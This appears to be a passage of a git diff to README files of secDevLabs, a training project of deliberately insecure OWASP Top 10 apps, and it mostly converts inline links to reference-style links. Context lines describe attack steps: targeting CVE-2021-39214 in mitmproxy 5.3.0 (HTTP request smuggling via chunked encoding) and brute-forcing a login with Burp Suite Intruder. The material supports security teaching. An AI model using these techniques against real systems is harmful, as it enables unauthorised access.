As we can see this `Via: mitmproxy/5.3.0` helps us with the recon. Now that we know what is running on the server we can search for CVEs on this version of mitmproxy. Once we found the CVE-2021-39214, we can make an exploit to this vulnerability.
-Let's take a look on the mitmproxy source code, [TAG 5.3.0](https://github.com/mitmproxy/mitmproxy/tree/v5.3.0) at file [/mitmproxy/net/http/http1/read.py:L209](https://github.com/mitmproxy/mitmproxy/blob/a738b335a36b58f2b30741d76d9fe41866309299/mitmproxy/net/http/http1/read.py#L209):
+Let's take a look on the mitmproxy source code, [TAG 5.3.0][TAG 5.3.0] at file [/mitmproxy/net/http/http1/read.py:L209][/mitmproxy/net/http/http1/read.py:L209]:
```python
if "chunked" in headers.get("transfer-encoding", "").lower():
@@ -122,3 +122,5 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[secDevLabs]: https://github.com/globocom/secDevLabs
[app]: http://localhost:10006
+[TAG 5.3.0]: https://github.com/mitmproxy/mitmproxy/tree/v5.3.0
+[/mitmproxy/net/http/http1/read.py:L209]: https://github.com/mitmproxy/mitmproxy/blob/a738b335a36b58f2b30741d76d9fe41866309299/mitmproxy/net/http/http1/read.py#L209
diff --git a/owasp-top10-2021-apps/a7/insecure-go-project/README.md b/owasp-top10-2021-apps/a7/insecure-go-project/README.md
index 49c200e69..dca300447 100644
--- a/owasp-top10-2021-apps/a7/insecure-go-project/README.md
+++ b/owasp-top10-2021-apps/a7/insecure-go-project/README.md
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Identity and Authentication Failur
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a7/insecure-go-project
@@ -79,5 +79,6 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
+[secDevLabs]: https://github.com/globocom/secDevLabs
[app]: http://localhost:10002
[dirb]: https://tools.kali.org/web-applications/dirb
diff --git a/owasp-top10-2021-apps/a7/saidajaula-monster/README.md b/owasp-top10-2021-apps/a7/saidajaula-monster/README.md
index 4240f4b48..ac8d379d1 100644
--- a/owasp-top10-2021-apps/a7/saidajaula-monster/README.md
+++ b/owasp-top10-2021-apps/a7/saidajaula-monster/README.md
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Identity and Authentication Failur
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a7/saidajaula-monster
@@ -140,5 +140,6 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
+[secDevLabs]: https://github.com/globocom/secDevLabs
[app]: http://localhost:10002
[dirb]: https://tools.kali.org/web-applications/dirb
diff --git a/owasp-top10-2021-apps/a8/amarelo-designs/README.md b/owasp-top10-2021-apps/a8/amarelo-designs/README.md
index cbacc5052..f4fa20615 100644
--- a/owasp-top10-2021-apps/a8/amarelo-designs/README.md
+++ b/owasp-top10-2021-apps/a8/amarelo-designs/README.md
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Software and Data Integrity Failur
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a8/amarelo-designs
@@ -163,6 +163,7 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
+[secDevLabs]: https://github.com/globocom/secDevLabs
[app]: http://localhost:10008
[secdevlabs]: https://github.com/globocom/secDevLabs
[2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a8/amarelo-designs
diff --git a/owasp-top10-2021-apps/a9/games-irados/README.md b/owasp-top10-2021-apps/a9/games-irados/README.md
index dbef5d09a..e049cdfd9 100644
--- a/owasp-top10-2021-apps/a9/games-irados/README.md
+++ b/owasp-top10-2021-apps/a9/games-irados/README.md
@@ -23,7 +23,7 @@ The main goal of this app is to discuss how **Security Logging and Monitoring Fa
## Setup
-To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs](https://github.com/globocom/secDevLabs), you must type the following commands to start:
+To start this intentionally **insecure application**, you will need [Docker][docker install] and [Docker Compose][docker compose install]. After forking [secDevLabs][secDevLabs], you must type the following commands to start:
```sh
cd secDevLabs/owasp-top10-2021-apps/a9/games-irados
@@ -64,7 +64,7 @@ Initially, we begin the first attack by sending an intentionally wrong login att
## 🔥
-After that, an attacker could use [Burp Suite] as a proxy to send as many requests as needed until a valid password is found (if you need any help setting up your proxy, you should check this [guide](https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp)). To do so, after finding the login POST request, right click and send to `Intruder`, as shown below:
+After that, an attacker could use [Burp Suite] as a proxy to send as many requests as needed until a valid password is found (if you need any help setting up your proxy, you should check this [guide][guide]). To do so, after finding the login POST request, right click and send to `Intruder`, as shown below:
@@ -170,7 +170,10 @@ We encourage you to contribute to SecDevLabs! Please check out the [Contributing
[docker install]: https://docs.docker.com/install/
[docker compose install]: https://docs.docker.com/compose/install/
+[secDevLabs]: https://github.com/globocom/secDevLabs
[app]: http://localhost:10010
[secdevlabs]: https://github.com/globocom/secDevLabs
[2]: https://github.com/globocom/secDevLabs/tree/master/owasp-top10-2021-apps/a9/games-irados
[burp suite]: https://portswigger.net/burp
+[guide]: https://support.portswigger.net/customer/portal/articles/1783066-configuring-firefox-to-work-with-burp
+